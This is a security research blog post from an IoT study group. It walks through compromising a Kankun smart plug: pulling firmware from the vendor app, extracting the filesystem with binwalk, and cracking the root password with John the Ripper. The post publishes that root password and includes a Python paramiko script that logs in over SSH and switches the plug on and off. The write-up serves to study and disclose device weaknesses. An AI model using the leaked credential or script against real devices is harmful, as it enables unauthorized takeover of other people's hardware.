Exploiting the vulnerable Kankun smart plug

It has now been almost one year when we started to work on Internet of Things under IoT study group , an initiative by Null Bhopal chapter. Internet of Things have indeed makes a revolutionary change in the way we live, making it more comfortable. But it’s security still remains a point of concern. Small mistakes at the time of manufacturing can sometimes lead to heavy security breaches.

In this process of learning, one of our mentor, Mr. Anant Shrivastava, sponsored us a kankun smart plug and the loopholes present in it made it a perfect device for penetration testing.

The kankun smart plug is an ON/OFF switch that can be controlled by an app. In just a basic port scanning, it was found out that the smart plug has got SSH port open by default. And this makes the plug vulnerable to almost any kind of exploit that can be performed on an iot device.
i1

Initially started  with the manual. Google translate comes in handy ☺

The manual comes along with the plug that gives information of where to download the app from. The next step is to setup it up and connect the smart phone and smart plug to the same wifi network. And when successfully configured, the smart plug is added in the device list. Now the smart plug can be controlled remotely via mobile app. There is another feature “ Direct Mode” , where the smart plug acts as a station having SSID : OK_SP3 , and by default there is no password for the network.

i2

 

Exploitation phase

The very first thing to look for was the firmware. The reason being  that it gives the overview of the device’s software. Information such as the filesystem present, bootloader, the different binaries present can be of great help from a pentester’s point of view. Although the firmwares are available on the internet, but in case you are unable to find, the other approach can be to reverse engineer the app. But first you need to see the actual source code. There are many number of ways to get the source of apk file. Here we are going to use a tool named jadx that can be used  to extract the source code.

i3

 

Now next step is to analyse all the extracted files for any hardcoded URLs. The one way is to have a check all the files one by one but the process is time-consuming. Therefore intelligent use of grep can save us a lot of time.

i4

So here we use grep command with some switches that directly spits out the all url in all the file of all the sub-folders along with their line number. We started with Analysing Hangzhou folder. Luckily we found some hardcoded urls.

i5

 

The highlighted text in the above screenshot shows the hardcoded url in the file  PreferencesUtil.java. Since the url ends with .bin It could be the link to actual firmware. And yes, the app actually downloads this firmware from this url and flash it to the device. After downloading the firmware, run  binwalk on kkeps.bin binary file. And it provides you with loads of useful information such as :  LZMA compressed data, squashfs filesystem, so on and so forth. After getting this information, -e switch can be used for extracting the filesystem.

Binwalk can be downloaded as

#sudo apt-get install binwalk

And the further dependencies of binwalk can be resolved by running the script, that can be downloaded from the link

https://github.com/ReFirmLabs/binwalk/blob/master/deps.sh

# binwalk –e kkeps.bin    

i6

 

So here is the entire linux file system. So the next step would be to get the root password. Which is not very difficult if you have the entire file system.

 

# unshadow /etc/password  /etc/shadow > passwd.txt

i7

 

Cracking this with John the Ripper give Root password  which is p9z34c

CONTROLLING THE SMART PLUG WITH TERMINAL

Now that we know the root password We can directly ssh into the smart plug.

Now by default the kankun smart plug has ssh port open

i8

 

Turning ON and OFF the smart plug can easily done if we ssh into the smart plug. The root password is p9z34c. We have successfully extracted it.

Turning the smart plug off

# echo 0 > /sys/class/leds/tp-link:blue:relay/brightness

Turning the smart plug on

# echo 1 > /sys/class/leds/tp-link:blue:relay/brightness

This entire process can be done with the help of this python script  that I wrote. This script requires paramiko library.

“”

#apt-get install python-paramiko

import paramiko,sys

GREEN=’\033[92m’

BLUE=’\033[94m’

RED=’\033[91m’

RESET=’\x1b[0m’

if len(sys.argv) < 3:

print “args missing”

sys.exit(1)

host = sys.argv[1]

action = sys.argv[2]

ssh = paramiko.SSHClient()

ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())

print BLUE +”[*]   connecting to device”+ RESET

ssh.connect(host, username=’root’, password=’p9z34c’)

path=’/sys/class/leds/tp-link:blue:relay/brightness’

if sys.argv[2] == ‘on’:

ssh.exec_command(‘echo 1 >’ + path)

print GREEN +”[*]   turning it ” + action +””+RESET

elif sys.argv[2] == ‘off’:

ssh.exec_command(‘echo 0 >’ + path)

print RED +”[*]   turning it ” + action +””+RESET

ssh.close()

“”

That Is how we successfully managed to control the smart plug remotely without their Android app. ☺

This report is drafted under the IoT study group, an initiative by Null Bhopal chapter.

Thanks for reading!!

I also write tech and security related blogs on My personal website

Contributers :

Shreya Pohekar

Deepanshu Gajbhiye

 

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Google photo

You are commenting using your Google account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s